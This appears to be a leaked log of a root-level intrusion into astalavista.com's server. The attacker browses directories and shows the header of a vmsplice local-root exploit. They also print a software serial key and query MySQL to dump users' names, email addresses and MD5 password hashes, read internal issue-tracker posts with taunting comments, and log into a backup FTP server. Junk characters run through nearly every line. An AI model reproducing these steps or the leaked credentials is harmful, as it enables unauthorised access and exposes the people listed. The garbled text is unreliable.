2 O$ l1 ?9 X/ f9 S/ \# n5 v, Y' H4 l! s h# D9 a2 h' {4 k
sh-3.2# cd ..
" O1 x% n2 V7 u* p% Zsh-3.2# cd com) M( {8 G t, R1 H9 }
sh-3.2# ls -la
; W, a- r5 S7 ~( D( @" ~total 141208
5 u9 a9 Z. ~+ Vdrwx–x–x 10 com com 4096 Apr 28 12:40 .
+ H9 |) S( S2 ^. t' \ `! `0 ?5 qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ e% s$ h1 y& W( G
drwx—— 2 com com 4096 Jun 4 04:04 backups7 p3 g# U$ b. N* _8 x, n6 r& O
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
1 s, d2 F( S vdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
8 [9 j% i% i2 V! r-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
4 X u7 ^ Y( V) i8 G-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
& w0 q5 T$ [. D7 v5 H-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
4 B3 {' { }6 S* y7 e4 ?5 d-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
U7 O1 H& ?. i7 K; Xdrwx–x–x 3 com com 4096 Jan 29 2008 domains$ @( }9 k( L( e4 b4 a; g
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
8 I$ S# c6 K2 Y" {5 n% ^# Kdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
0 T2 _1 c& e4 w% q-rw——- 1 com com 69 Nov 18 2008 .lesshst) p; `$ z5 C# J$ D& d; M2 i, w! g9 A
drwx—— 2 com com 4096 Sep 24 2007 mail
% u! n5 s( M! ?-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history% M2 f% J$ R) u" F4 N' g+ ?$ ^
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
% y; W( ^$ a0 Jlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html3 e) w# C. o5 E& ~% ~4 U6 E+ b+ b7 b
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow: j+ n8 h* ^5 }, J; d3 \
drwx—— 2 com com 4096 Aug 26 2008 .ssh
) g+ H+ O" j! _2 _% u" T7 S-rwx—— 1 com com 8515 Feb 10 2008 t& R2 k( n4 `1 N6 |; U( d
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
0 q9 J6 J1 k: a" odrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp" E) i: y3 H& i& r4 y
-rw-rw-r– 1 com com 617 May 20 2008 .toprc6 A% @# H U- l) b- x
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql& M+ y; W3 d+ F5 s( d/ b! X
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
7 C" a( I0 h! T! W8 y-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
( Q% v6 o8 z& _% e5 [, X9 D6 P$ l/ q& a5 t7 B$ V
sh-3.2# head t.c( I. _2 L3 t$ E5 ^: q! F0 n
/*
' I% t1 P7 s3 w1 O, X* jessica_biel_naked_in_my_bed.c& A3 [, v) Z9 @
*
5 W' D4 _0 o' X" S( x% u* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
- X+ L! E G. `* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.% M% D' C2 B& k$ K/ T' n
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
9 b/ m0 x, y5 Y2 e; S*( Q9 t& o& Y \6 \' I# g
* Linux vmsplice Local Root Exploit0 }" o9 y) _% ~5 {8 m! d0 Y
* By qaaz3 ]- K/ X( E8 F6 z
*
. G+ s9 Y* m/ i/ C- `8 \" i* X: {* o v* l$ W
sh-3.2# cd /
7 S4 q6 N C7 z) ]+ B" J- @sh-3.2# ls -la% L. u0 n3 E( ]6 c# k
total 360
# \9 c9 L) b5 s" hdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
5 l/ }% M5 C0 O! gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..8 [0 Y1 i& a- B" Y; C; a) x3 L4 H- I
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group' O0 s2 ?; o8 ~2 n) D8 D
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user0 l; w- w. a$ l! w. ^, {2 l
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db- v/ Y$ o5 |$ D [* I
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
7 q1 q; m6 I2 p4 z-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
% i( l7 m: e- y1 {drwxr-xr-x 3 root root 4096 Dec 29 2007 backup" X4 z( \% k4 |3 W
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
Z4 d# Y: B1 Sdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot; Z, h0 A4 u4 j# P1 B. f
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
$ a$ k+ A( U4 W+ B$ M$ s/ @drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
+ N: B0 s* U N$ O7 ^) Kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home x/ k, J# `6 D1 A9 D
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf6 n, W/ s- L* ?; D1 v& p W; s
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
, a9 T2 L, Z v1 a Rdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64& k: o8 q' D8 E. b2 V$ f3 A
drwx—— 2 root root 16384 Sep 11 2007 lost+found) }5 R6 j5 R, a* E
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media j9 e1 d9 O* w6 o$ q& W; z$ t3 P2 k
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
- W- F9 O3 ]' g4 X' T5 |1 odrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt5 M' M+ S) ^. }5 |* Z
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg/ i. S5 ]4 t* y' l. {9 Z
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
G8 N- p/ i" C% z$ ?' wdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
2 K9 q1 P* i0 L; ] V6 sdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
' q8 v, C) {( `6 m# x- jdrwxr-x— 15 root root 4096 Jun 4 08:40 root
+ p3 R3 J! j5 Q$ Fdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
" M! }# N9 p7 C3 X3 Xdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
0 A% M8 E. J1 Y3 I9 g3 X5 z6 L: Xdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
( W( \3 F' ~. p% ~drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
; `5 Q# t# ~; v% pdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp) m8 h1 L0 ]8 ^7 Q% m
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr1 G) l: N7 ~( X9 V5 h8 W. @ C
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
3 z5 K6 c& V6 ]1 r8 A3 S, o5 B' r9 M! n2 u0 h
sh-3.2# cd opt
4 m+ k, J' V! p5 t* p1 z4 ?- hsh-3.2# ls -la% H! X# ~/ _* Y- ^% r
total 20
" J+ M/ }$ u5 {1 Ndrwxr-xr-x 3 root root 4096 Mar 11 17:56 .! A; r% q7 j- ^- p- a+ K
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, Q m7 {& z8 ]+ Q3 edrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws1 `+ r1 D; h6 j; r
; m& q0 E" \) |- ]) P6 `* G1 Hsh-3.2# cd lsws/
! ^9 t A( A* ~0 p! vsh-3.2# ls -la
2 u# r" T7 C- q: X3 {1 dtotal 108
1 U, N0 ^: q1 {; H4 A* b# ?% rdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
2 A9 E2 ^* O2 i/ Kdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..! b" m& W: D* N1 v) c, d0 D
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons( l7 e C, ]' @- f6 [. c
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
1 v9 d! k; M4 Z; q( Odrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate, s4 t( Q6 T! Z+ @+ K: L$ u
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
3 r! \; P; T4 @drwx—— 4 apache apache 4096 Jun 3 02:43 conf
) k& w* K$ D. b/ H0 Rdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT0 Y0 R3 C& Z" ~0 ^
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs Z& K* m! h9 A8 U n' q
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin$ s: P& d, P) W! d
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib6 Z0 B+ Y3 V' T: P, R+ f
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE4 O9 R$ u3 Q, h. E: J
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
; a% o6 y' W1 v- u" G-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL3 Z ?3 h2 r& |5 x0 e
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP$ `! d c/ ?8 L+ t) [: y
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
# b1 o6 c0 _7 A. S3 Y! Jdrwxr-xr-x 2 root root 4096 Mar 20 2008 php- \( l8 T8 m9 G, V
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild+ l2 ^+ G* z$ N3 C( M8 }9 e, i
drwxr-xr-x 3 root root 4096 Mar 20 2008 share- _; q: Z9 N. h$ K( z' o, M
-rw-r–r– 1 root root 6 May 29 15:10 VERSION: E: h8 e& o! g6 {1 b; w
; f* _* W6 Z) t' A4 vsh-3.2# cd conf
5 ^+ [, S+ t5 l/ P& A9 Dsh-3.2# ls -la( K" C P h* Z1 E9 ~; _3 R! E
total 48- u: o( C% W0 l. M
drwx—— 4 apache apache 4096 Jun 3 02:43 .1 C+ A5 l. n0 K/ p
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
: z0 u E! a1 c h1 Ddrwx—— 2 apache apache 4096 Mar 20 2008 cert3 L" S: s1 u( L2 b2 N) g
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
8 `+ }4 K0 Q( @6 k6 p' c-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
) c9 }5 y, m* n7 U" [-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
5 u( {: @. U& u3 n! a% k-rw——- 1 apache apache 256 May 29 15:10 license.key
" C6 N6 U4 m8 K6 N3 t8 ~-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
0 Q2 ]4 Z% v: C, a, A7 d-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties9 [9 [" G0 L1 [9 a+ \* T0 N7 ?
-rw——- 1 apache apache 20 May 29 15:10 serial.no, e6 V. c v4 Z/ H2 }' }: h1 g
drwx—— 2 apache apache 4096 Mar 20 2008 templates
- X5 Q* A: [; ]* ]% \
' J6 [8 `# ]% |& a% U- G9 rsh-3.2# cat serial.no! b+ S; @4 s$ j/ \8 r
IbDl-oVsO-CKqL-wVRa
9 y5 @# ~: u* _* l
$ L" P* w9 }" l6 {+ V7 Dsh-3.2# mysql& }! M7 X. Z' n1 b! q$ F
Welcome to the MySQL monitor. Commands end with ; or \g.
% R' \! X6 X2 c* ~7 Z7 XYour MySQL connection id is 286844: u' f6 e1 X0 z/ r& J% Q
Server version: 5.0.45-community-log MySQL Community Edition (GPL)! r, l& i6 J. C, Z
* q3 X2 C0 A a7 E/ O1 VType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
- J' x0 ^: M0 K2 v2 {$ Z$ @5 m
7 h+ z! [* P. B8 L# A. _* U, tmysql> show databases;
1 l, B2 R; e+ P2 A+———————–+. g0 Q! H% I0 Y" r9 f7 N1 A
| Database |( F) d; C! _1 m& ^
+———————–+3 l) q6 E. h. Y0 `3 n( L1 q
| information_schema |: t" e- g* I2 s! l# p* q2 X& R% l
| astanet_ads |5 J; x% m+ e9 t4 H" n, y
| astanet_mailing_lists |
" `, ?& J# b1 V3 C$ l' t| astanet_mediawiki |
: e0 o3 I! f9 \: r. l, \* b0 y| astanet_membersystem |1 k1 H; U7 b7 P" m( m' ?
| com_contrexx |1 I; ]7 p$ ]. Q: k
| com_contrexx2 |
2 z0 r) G) d. M) z! d+ l| com_contrexx2_live |
' p3 N c# a: X3 l7 K| da_roundcube |
* |+ D% h/ w y) `9 J; E# P| dolphin |4 {2 r; |9 t0 {* ]+ |3 a! B6 U
| ideapool |% L7 y" ^9 F L9 h; q( Z- j9 W/ a- a
| mysql |
' ^ A* w( `2 w| test |
9 H) o, t* W. t6 f) x6 {, Y| yourmaster |: N0 D; l- h/ a E5 y
+———————–+
* p* A0 c) n9 M0 _& N14 rows in set (0.00 sec)/ a/ W2 i% R( K% x
9 U& j1 H1 c/ u5 h* I7 Imysql> use ideapool
& S% I2 e' v2 {0 C; k kDatabase changed
, e% }, I' h$ `3 } xmysql> show tables;" P; P7 z9 S5 p
+———————————–+
( n8 P4 i' b8 [4 V5 ?' `| Tables_in_ideapool |: f3 L8 ~- U5 C9 a2 ]7 O! k
+———————————–+: P' x" V( O9 b$ X
| eventum_columns_to_display |
1 z2 Z5 d; J, ?2 b B* U. M4 q8 f| eventum_custom_field |
8 G' p& g6 j: J6 f# j5 ^4 I| eventum_custom_field_option |
5 g1 c6 f! k/ H* L% {6 c| eventum_custom_filter |4 C( j6 W2 P: v6 E% I% ^
| eventum_customer_account_manager |
0 I% r S6 X; |" ]; ^( w" z9 _| eventum_customer_note |! s' G" R$ j. x4 F2 V2 L- h
| eventum_email_account |
' x2 G: e x, k6 {8 h2 O( e+ {| eventum_email_draft |1 W! @$ i F E j3 [, z) l
| eventum_email_draft_recipient |
8 d: n* c; w' Q5 x5 @# e7 u| eventum_email_response |
; b7 x- z9 I: Y: }| eventum_faq |! K3 @( M6 G* ~1 C+ c
| eventum_faq_support_level |4 a6 ]; }+ y9 O) _ M' t
| eventum_group |
/ Y5 l! O2 x' k1 ^6 k* l| eventum_history_type |' H) C/ o0 `5 P6 P: n6 {+ ^( }
| eventum_irc_notice |, q5 ]2 a1 o; j5 D. s0 a7 {- z6 X
| eventum_issue |
8 Q! Q/ D* ~- Q& k# s* _| eventum_issue_association | o! h, F# I% N. E. P( \* L
| eventum_issue_attachment |; i+ {. `9 z& l
| eventum_issue_attachment_file |0 H2 e8 w/ k: M; T: Z
| eventum_issue_checkin |
0 T# ]5 Z$ Y! y# f1 \6 g| eventum_issue_custom_field |/ i* F5 g* j: P {) c& \
| eventum_issue_history |2 s$ ]& ?1 i9 J) A( `
| eventum_issue_quarantine |
2 n$ u2 N+ e3 j. }) {| eventum_issue_requirement |, b. w# u0 h' z* E" Y/ Z
| eventum_issue_user |
* J- x _. {4 r q) ~: N( B| eventum_issue_user_replier | L/ g: F7 {5 r3 j( c2 k
| eventum_link_filter |3 e$ f, p# j, e+ \1 q1 ^3 J
| eventum_mail_queue |$ {/ |- s# k, q% Q- O% Y( ]6 Q& l
| eventum_mail_queue_log |9 o* A$ D: c9 R3 [
| eventum_news |9 I" @! R# h& X8 ^; @; g5 a) L
| eventum_note |- P: ]/ g# V6 V6 n& i' X
| eventum_phone_support |
; k5 e. F6 s1 t/ F5 [| eventum_project |
( I$ L$ o. s( S: }1 V* Q8 X! i| eventum_project_category |
! R z* Z: I2 ]% r( a5 h| eventum_project_custom_field |2 d: W4 p6 _2 W2 s7 U
| eventum_project_email_response |
0 z% Z J7 w' s3 s2 h| eventum_project_field_display |
' S* C2 v8 k% v" J5 B1 ^2 d; F| eventum_project_group |
5 |+ G: n0 }5 t( d# z| eventum_project_link_filter |7 `& G( `( x2 S1 H% S) S1 X9 d
| eventum_project_news |
) C0 H5 V8 |8 i S3 X" B( B4 e. X( R ~| eventum_project_phone_category |# ?1 x! A6 \8 L' g+ u& I* k8 t
| eventum_project_priority |
. j$ I ?' y" t: x v! b| eventum_project_release |
P: N. ?6 q; O| eventum_project_round_robin |/ c$ e C$ k4 Q% [% o
| eventum_project_status |
2 h2 N3 }0 g7 d| eventum_project_status_date |
7 _' E( H9 ?% U" c5 u9 s| eventum_project_user |7 t* g$ C& o! s# M# @
| eventum_reminder_action |/ b; D$ K+ z* ]# q R2 p5 h
| eventum_reminder_action_list |
# H+ ?- ^( x, L6 {0 u( v+ M| eventum_reminder_action_type |# v, b) N- p* H* I: v
| eventum_reminder_field |" a3 x9 c( Q4 r9 K4 J
| eventum_reminder_history |( p1 [# l* j: H' m
| eventum_reminder_level |3 N) O4 n1 X7 C& `' y
| eventum_reminder_level_condition |4 _7 q4 L; l; F4 h4 L! c7 y% t; n1 f* f
| eventum_reminder_operator |
& E9 ?9 ^0 F- z6 e$ ^| eventum_reminder_priority |
$ P9 J: x, g5 s7 [$ L9 Z* F2 T2 g% z- A| eventum_reminder_requirement |
5 _2 \ D+ \4 a* P0 c| eventum_reminder_triggered_action |
& k0 F% [- g: N4 q- X0 b| eventum_resolution |
" a7 _1 I* p6 Z0 q2 t# R| eventum_round_robin_user |
+ M' `3 P- _$ I' a( L0 k# L| eventum_search_profile |5 N0 w* c2 ~- F$ g+ _; _
| eventum_status |# _0 i% z- a- V% {, F( c! R7 {
| eventum_subscription |+ f4 K1 n9 O0 M3 S! G( V/ ^
| eventum_subscription_type |
/ }7 t6 V+ U4 w: v4 l7 K$ k| eventum_support_email |% d1 C1 _! J& J& D2 O0 @& G( V
| eventum_support_email_body |3 C$ W3 Y2 }1 c# I5 \2 w
| eventum_time_tracking |1 P; t @6 e: ^5 }" M1 U
| eventum_time_tracking_category |
i3 c E% p9 f. N6 E" M| eventum_user |
9 G& }% n6 O9 R+———————————–+
. r* ^( K, u0 ]0 _6 m- g! P69 rows in set (0.00 sec)
- H" ?) N5 j3 C1 ~6 C7 W, {$ M0 y; a5 A8 q
mysql> describe eventum_user;" T: T5 R/ j6 Z; y& J: B8 z
+————————-+——————+——+—–+———————+—————-+
- m! _4 r ?- v8 @$ z| Field | Type | Null | Key | Default | Extra |6 _- i7 h$ G0 A; V A! J
+————————-+——————+——+—–+———————+—————-+
, a$ t1 {& G V- | C6 Y| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
# O9 ]* y) G& W F( l7 c2 s| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |3 ~/ ~7 z- k) ]- `! s0 U# v8 [
| usr_customer_id | int(11) unsigned | YES | | NULL | |
3 ~# Z, {$ q4 O) ]| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |& v, x ~: J* A) _5 ]7 p8 d) k6 c
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
' ?2 ~; k. Z; z2 q| usr_status | varchar(8) | NO | | active | |
' I; v6 e7 B2 c| usr_password | varchar(32) | NO | | | |
. U8 J+ F1 ?3 P) x! S) [| usr_full_name | varchar(255) | NO | | | |
o* q$ \' G( R( U1 A# || usr_email | varchar(255) | NO | UNI | | |
2 Z6 ^6 R: u; }( c| usr_preferences | longtext | YES | | NULL | |
- i; v3 K" l: |& U8 I| usr_sms_email | varchar(255) | YES | | NULL | |
- T! G/ ]: c( y- @# v| usr_clocked_in | tinyint(1) | YES | | 0 | |' |8 g" S3 O) O. ]: c% c" L
| usr_lang | varchar(5) | YES | | NULL | |" ]# a" e3 U8 G6 K6 z
+————————-+——————+——+—–+———————+—————-+& b8 r# I! `" z5 ], w) a& F0 t
13 rows in set (0.00 sec), l! K5 H. d: h- p& N6 v1 N
4 b8 L2 i d. D& t
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
# x: C+ \6 n, U( \" K0 u- ^8 k+———————-+——————————-+———————————-+
# Q9 `7 `8 v6 @ Q. h| usr_full_name | usr_email | usr_password |8 b& M; i+ _) K* v" h: Y
+———————-+——————————-+———————————-+; U6 B4 Z! L) U8 G% E
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |' C/ ^/ B* o4 c: r
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
3 k1 V' v7 a+ \2 n$ ?5 P: \| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |9 }& K" d/ ~* R" p% I8 v
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
8 Y4 ^- @/ q5 M| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
/ ~; p5 i; ^- }* u- L" [& h' {| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 | n# D% w8 Q( d% V
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |2 M' Y. |* w- Z% h( V; m
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |$ Z* V) s, |4 o8 z' e
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
4 T# j! g/ |& I| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 | B: B! F8 L2 X6 n; J2 Y2 m
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |1 d; `% T {9 T' k6 f( I% E
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
1 l! z; O) H, h( F2 j6 Y/ o( f4 S| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
7 Q' F l% A& c7 J1 C2 @. @$ v| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
( C4 |/ q0 ^7 A4 @| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
4 Q o2 O( t- u! ]( s4 V1 J+———————-+——————————-+———————————-+, X4 Q2 I) W1 F6 B
15 rows in set (0.00 sec)
( P( b: E/ V3 z2 J# Q F( s. V9 c, R
mysql> select iss_description from eventum_issue where iss_id = 43;: w' ?# h; z* q4 B8 U% v
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+' ~1 l, x) O# {" v6 |
| iss_description
( g# b0 W( B; `+ O|
& u+ O. q! X- L8 p+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
3 |% \# ?0 E, d& q- T) I| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
" V1 S1 j; ^2 V7 ^3 l& B# `connected for 90 mins… 120mins… so what i propose is something like:
* h: |, X# l& j& @链接标记[url]http://www.surfthechannel.com/[/url]
" W9 k: [: L( u* }& _since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system, {; D3 [( n( t* M+ {
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t v2 N1 J' C$ q
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
& Y! q1 I, e: J( X& q. n7 V: Qif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
6 P/ d* F$ w6 \' `
' c8 E. ?9 L8 }: L! Y( @We could also put advertisement during play on the flash video player itself… extra $$…
y, g' S1 a' p/ O; v0 i$ z
' l2 \* E& p7 j$ YBy sykadul |+ `" F" t) y2 U* Q. K
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
o3 |; S/ [1 ~1 row in set (0.00 sec)
, z1 d+ ?, P4 h' t7 f% g
% H) I% N( ?7 W# ~// Money and extra $$ is all they care about. remember that." H8 Q) C. o+ q2 K
( e0 n {* ]# c, R2 _6 \
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
# V0 }6 U' R% I+————————+——————————————————————————————————————————————————————————————————————————————-+9 w, o: O$ i- H2 h6 ^+ w8 ?
| iss_summary | iss_description 6 C* \* o* H& K, A& ?2 c' ]
|, q5 T5 O! d+ X& V& Q, S
+————————+——————————————————————————————————————————————————————————————————————————————-+) s/ ~ F1 j t6 f# y0 h0 Z
| Forum for REAL EXPERTS | Hello,
( z! ^7 g) G c6 J$ M# H) M+ X4 _6 ?9 } `4 F- T1 q
Ishtus and I,0 _! M$ |& {' h. R W: O7 R3 s
1 n* ]9 _- J) Q, [- s5 H
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide; v! p4 q* U1 i0 p5 r
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc... h( g. y; K6 M& {* H9 O
; `" o) z) [" h& N1 I3 s. n' |
One example a friend of mine from coresecurity.com!5 o* M, B% {! R
( q1 G4 @' o/ o3 K0 rWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..% }, W7 Z* s/ i% J! V
8 Q% I! w1 d( z6 f, t
|. o+ t; k; S& G+ R4 v! I
+————————+——————————————————————————————————————————————————————————————————————————————+
2 C: ] ]. d4 r5 i1 row in set (0.00 sec)2 z! Y: ^6 v7 S4 w
1 D7 c6 f+ Y; m" O) L* h# B
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
P x" L9 M& I" q+ G1 y" w+ s* k' j
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
4 J7 S9 E' c) e! R( t4 [+——————+———————————————————————————————+
) U/ N+ V* B T y, [ |# x; l! W& g| iss_summary | iss_description |5 g$ H) V( n! u l
+——————+———————————————————————————————+; t' t& o5 Q% y! |8 G
| Website guidance | Virtual Girl which guides you trought the website.4 l( t2 ?9 Z. O, h' a" t9 b: a/ n
' z1 t2 p, y1 Z$ M7 C
We need a girl with who you can ( talk )!!!% y; _5 n, U# C4 u0 F' o
Also for the News!
' t& Y5 T1 W; c# ^So my suggestion is a girl who read you the news loud if you like!: U2 ]0 n9 ?5 l5 Z J
you can choose between read yourselfe or she read it for you or both!: c, K9 @4 I( \5 Y3 X* i- S
. S }8 }+ s. h i
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
/ C V* j( E# K' V
5 V. M8 }" E7 O2 w, D. b8 S- ~Have a look on the example girls!!0 I) r+ r9 @% i8 @3 g8 }. P
: t/ G1 E( a8 a: m5 g8 g; A
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
& s9 A! T# j7 R( E |3 p1 F) f% N& H; }+ _1 Q: F7 q- }* _9 ]8 N
or that, h' u3 B3 \2 R5 [
: j" w3 @3 D$ P链接标记[url]http://www.yellostrom.de/[/url]
0 ?* d m E5 m9 M- j
/ s% S5 v# {) @( |. T/ b0 K0 t6 u& b|# f/ J K& Y. Z( w
+——————+———————————————————————————————+4 m% p+ Z B$ R P- w7 [! l
1 row in set (0.00 sec)2 p" _4 K* u8 T1 d6 {( @
- P x) f3 Y6 @, O2 P1 w) Z, U/ E; z// ha ha.
1 C l. ^# H% Y0 K6 Y( y+ S+ L; l0 Z g
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
6 z) T' @/ l2 a$ w+————————–+———————————————————————————————————–+9 E) {+ x5 H& [/ D f
| iss_summary | iss_description |& w$ N- l8 |$ \/ ~
+————————–+———————————————————————————————————–+
$ V$ s3 N+ Y/ s7 v| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
0 l( }; ^0 y0 R5 q- ^: ^+————————–+———————————————————————————————————–+
5 n3 L h) u" a1 row in set (0.00 sec). C) b S& p/ c
/ h" ~. G7 Y" ] ]// LOL.
% X% v5 I& H6 F% `8 p1 o4 d
; ^) b# R8 n# ^0 |3 mmysql> exit+ B/ Q7 w9 _. [- i$ {3 a- P
Bye
! @( F' R; X/ r7 ~ F5 c4 k7 o+ [: X0 @* ]$ |3 D) m1 k0 `
sh-3.2# ftp 212.254.194.1639 b) L, Z' C4 s; V0 h/ {
Connected to 212.254.194.163.
8 X- P2 q; a B220 BackupCOM_VW FTP server ready.2 s* o$ A6 L5 u3 L" F
504 AUTH: security mechanism ‘GSSAPI’ not supported.0 H+ O) H) A% ~1 s( s# y$ j6 J
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.) C) F' g/ I, x( t* q% N7 T
KERBEROS_V4 rejected as an authentication type
7 Q- C& M$ `0 g- y5 t6 _0 ]4 CName (212.254.194.163:root): astalavista.com
; W5 W& [/ O3 H# J# U331 Password required for astalavista.com.
2 Z2 K# A" g; D7 OPassword:
7 d0 t2 L# @: Y230 User astalavista.com logged in.
" n7 s7 i$ v ~ C( IRemote system type is UNIX.
* F8 v: Z/ t6 ZUsing binary mode to transfer files.5 j* f" E; ~, G* W/ V+ D) q* |4 D7 M
ftp> ls -la
5 w2 _4 L2 B6 ]227 Entering Passive Mode (212,254,194,163,2,188)
4 D Q% V" g- F2 |3 [150 Opening BINARY mode data connection for ‘file list’.
" c. e0 w6 Y. N+ v6 Ddr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
; s! d( j L! m4 F* b226 Transfer complete.' i& @' i" H! Z- j, O4 g3 n. F$ ~
ftp> cd astalavista.com9 c; h2 ]0 j2 i: E' v$ z' R
250 CWD command successful.
